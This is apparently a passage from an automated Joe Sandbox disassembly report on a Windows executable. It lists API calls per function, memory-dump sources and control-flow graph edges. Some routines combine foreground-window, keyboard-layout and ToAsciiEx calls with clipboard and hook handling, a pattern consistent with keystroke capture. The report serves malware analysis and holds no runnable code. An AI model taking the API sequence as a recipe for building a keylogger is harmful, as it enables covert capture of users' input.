      • Part of subcall function 00431D40: SetTimer.USER32(000601DA,0000000C,00003FFF,004037F0), ref: 00432418
      • Part of subcall function 00431D40: GetForegroundWindow.USER32 ref: 0043250A
      • Part of subcall function 00431D40: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00432517
      • Part of subcall function 00431D40: GetKeyboardLayout.USER32(00000000), ref: 00432522
      • Part of subcall function 00431D40: ToAsciiEx.USER32(00000000,?,?,?,?,?), ref: 00432561
      • Part of subcall function 00431D40: _strncpy.LIBCMT ref: 004325C4
      • Part of subcall function 00431D40: _strncpy.LIBCMT ref: 004326C9
      • Part of subcall function 00431D40: KillTimer.USER32(000601DA,0000000C), ref: 004327B9
      • Part of subcall function 00431D40: GetQueueStatus.USER32(00000010), ref: 004327CC
      • Part of subcall function 00431D40: _strncpy.LIBCMT ref: 004329E7
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004403A0: SetLastError.KERNEL32(00000000), ref: 0044041A
      • Part of subcall function 004403A0: DeleteFileA.KERNELBASE(004987E9), ref: 00440421
      • Part of subcall function 004403A0: GetLastError.KERNEL32 ref: 00440430
      • Part of subcall function 004403A0: FindFirstFileA.KERNEL32(004987E9,?), ref: 004404AB
      • Part of subcall function 004403A0: GetLastError.KERNEL32 ref: 004404BA
      • Part of subcall function 004403A0: GetTickCount.KERNEL32 ref: 00440546
      • Part of subcall function 004403A0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440565
      • Part of subcall function 004403A0: GetTickCount.KERNEL32 ref: 0044057B
      • Part of subcall function 004403A0: DeleteFileA.KERNEL32(?), ref: 004405CF
      • Part of subcall function 004403A0: GetLastError.KERNEL32 ref: 004405D9
      • Part of subcall function 004403A0: FindNextFileA.KERNEL32(?,00000010), ref: 004405F9
      • Part of subcall function 004403A0: FindClose.KERNEL32(?), ref: 0044060C
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 46155 415820-415848 call 484959 46158 41584a-415850 46155->46158 46159 415853-415885 SetTimer 46155->46159 46160 415894-4158c4 GetTickCount 46159->46160 46161 415887-41588f 46159->46161 46163 4158c6-4158dc SetTimer 46160->46163 46164 4158e2-41591d GetTickCount call 423f40 46160->46164 46162 41593e-41594f 46161->46162 46166 41596a-415a0c call 474680 46162->46166 46167 415951-415967 call 42d970 46162->46167 46163->46164 46171 415938 46164->46171 46172 41591f-415930 KillTimer 46164->46172 46176 415a49-415a52 46166->46176 46177 415a0e-415a14 46166->46177 46167->46166 46171->46162 46172->46171 46175 415932 46172->46175 46175->46171 46177->46176 46178 415a16-415a1c 46177->46178 46178->46176 46179 415a1e-415a24 46178->46179 46179->46176 46180 415a26-415a2c 46179->46180 46180->46176 46181 415a2e-415a44 call 415a90 46180->46181 46181->46176
    APIs
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
    • SetTimer.USER32(000601DA,0000000E,04EF6D80,00403830), ref: 00415880
    • GetTickCount.KERNEL32 ref: 004158A6
    • SetTimer.USER32(000601DA,0000000B,00000064,00403730), ref: 004158D5
    • GetTickCount.KERNEL32 ref: 004158E9
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
      • Part of subcall function 00423F40: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
      • Part of subcall function 00423F40: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
      • Part of subcall function 00423F40: __alldiv.INT64 ref: 00425256
    • KillTimer.USER32(000601DA,0000000B), ref: 00415928
      • Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
      • Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
      • Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
      • Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
      • Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 46183 489dcf-489de8 call 48c2a4 46186 489e01-489e03 46183->46186 46187 489dea-489def call 489208 46183->46187 46188 489e12-489e17 46186->46188 46189 489e05-489e10 call 489208 46186->46189 46200 489df5-489dfc 46187->46200 46191 489e19-489e1e 46188->46191 46192 489e2f-489e46 46188->46192 46189->46200 46197 489eab-489eb4 46191->46197 46198 489e24-489e2c 46191->46198 46195 489e74-489e7c 46192->46195 46196 489e48-489e52 call 484e67 46192->46196 46202 489f02-489f15 call 48cfbf 46195->46202 46203 489e82-489e97 46195->46203 46211 489e54-489e5e call 484e67 46196->46211 46212 489e60-489e6b call 48e7e5 46196->46212 46204 489f2f 46197->46204 46198->46192 46205 489f30-489f32 46200->46205 46216 489f18-489f1b 46202->46216 46206 489e99-489e9e call 48cfbf 46203->46206 46207 489eb6-489ebc 46203->46207 46204->46205 46217 489ea3-489ea9 46206->46217 46214 489ebe-489ec1 46207->46214 46215 489ed9 46207->46215 46211->46212 46229 489e6d-489e73 call 48e79c 46211->46229 46212->46195 46212->46229 46214->46215 46219 489ec3-489ed7 46214->46219 46218 489ede-489ee2 46215->46218 46222 489f26-489f29 46216->46222 46223 489f1d-489f24 46216->46223 46224 489ef8-489f00 46217->46224 46218->46224 46226 489ee4-489ef6 call 48e6b2 46218->46226 46219->46218 46228 489f2e 46222->46228 46223->46228 46224->46216 46226->46223 46226->46224 46228->46204 46229->46195
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 46234 4149b0-414bec call 48dc70 call 468a20 46239 414c10 46234->46239 46240 414bee-414c0e call 42d7a0 call 415a90 46234->46240 46242 414c14-414c30 OleInitialize 46239->46242 46240->46242
    APIs
    • OleInitialize.OLE32(00000000), ref: 00414C15
      • Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
      • Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
      • Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
      • Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
      • Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 46246 486a00-486a08 46247 486a17-486a22 call 484959 46246->46247 46250 486a24-486a25 46247->46250 46251 486a0a-486a15 call 489585 46247->46251 46251->46247 46254 486a26-486a37 46251->46254 46255 486a65-486a7f call 48c10c call 48c188 46254->46255 46256 486a39-486a64 call 48bf9d call 48535d 46254->46256 46256->46255
    APIs
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
    • std::exception::exception.LIBCMT ref: 00486A4F
      • Part of subcall function 0048C188: RaiseException.KERNEL32(?,?,00486A7F,0046EE2A,?,?,?,?,00486A7F,0046EE2A,004A15F4,004A80F8,0046EE2A,00000000,004AD3B0,00420EBC), ref: 0048C1CA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • IsWindow.USER32(000601DA), ref: 00415E19
    • DestroyWindow.USER32(000601DA), ref: 00415E31
      • Part of subcall function 00409DC0: PostQuitMessage.USER32(00000000), ref: 00409DC9
      • Part of subcall function 00409DC0: UnhookWindowsHookEx.USER32(00000000), ref: 00409DE5
      • Part of subcall function 00409DC0: UnregisterHotKey.USER32(000601DA,00000000), ref: 00409E2C
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0048938E: GetModuleFileNameW.KERNEL32(00000000,004A8182,00000104,00000001,00000000,004011C4), ref: 0048942A
      • Part of subcall function 0048938E: _wcslen.LIBCMT ref: 00489459
      • Part of subcall function 0048938E: _wcslen.LIBCMT ref: 00489466
      • Part of subcall function 0048938E: GetStdHandle.KERNEL32(000000F4,00000001,00000000,004011C4), ref: 004894DC
      • Part of subcall function 0048938E: _strlen.LIBCMT ref: 00489519
      • Part of subcall function 0048938E: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00489528
      • Part of subcall function 00484A18: ExitProcess.KERNEL32 ref: 00484A29
    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0048C631: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,004A18C0,00000010,004871C6,004A1688,0000000C,00487243,?,?,00000040), ref: 0048C6ED
      • Part of subcall function 0048C631: RtlEnterCriticalSection.NTDLL(?), ref: 0048C716
    • @_EH4_CallFilterFunc@8.NTDLLP ref: 004871F7
      • Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C54E
      • Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C578
      • Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C597
      • Part of subcall function 0048C39A: __Stoull.NTSTC_LIBCMT ref: 0048C5B6
      • Part of subcall function 0048C39A: __wsopen_s.LIBCMT ref: 0048C5FA
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __initterm_e.LIBCMT ref: 00484ACF
      • Part of subcall function 00489B20: __FindPESection.LIBCMT ref: 00489B7B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,004719BE,00000000), ref: 0048EA06
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __tsopen_nolock.LIBCMT ref: 00490C3F
      • Part of subcall function 004904A1: CreateFileA.KERNEL32(?,?,?,0000000C,00000001,00000080,00000000), ref: 004906E4
      • Part of subcall function 004904A1: CreateFileA.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 0049071D
      • Part of subcall function 004904A1: GetLastError.KERNEL32 ref: 00490741
      • Part of subcall function 004904A1: GetFileType.KERNEL32(?), ref: 00490760
      • Part of subcall function 004904A1: GetLastError.KERNEL32 ref: 00490785
      • Part of subcall function 004904A1: CloseHandle.KERNEL32(?), ref: 00490797
      • Part of subcall function 004904A1: __chsize_nolock.LIBCMT ref: 00490873
      • Part of subcall function 004904A1: CloseHandle.KERNEL32(?), ref: 00490B4D
      • Part of subcall function 004904A1: CreateFileA.KERNEL32(?,?,?,0000000C,00000003,00000001,00000000), ref: 00490B6D
      • Part of subcall function 004904A1: GetLastError.KERNEL32 ref: 00490B77
      • Part of subcall function 00490C6B: __unlock_fhandle.LIBCMT ref: 00490C92
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • __freebuf.LIBCMT ref: 0048744D
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00487BF6), ref: 0048925A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
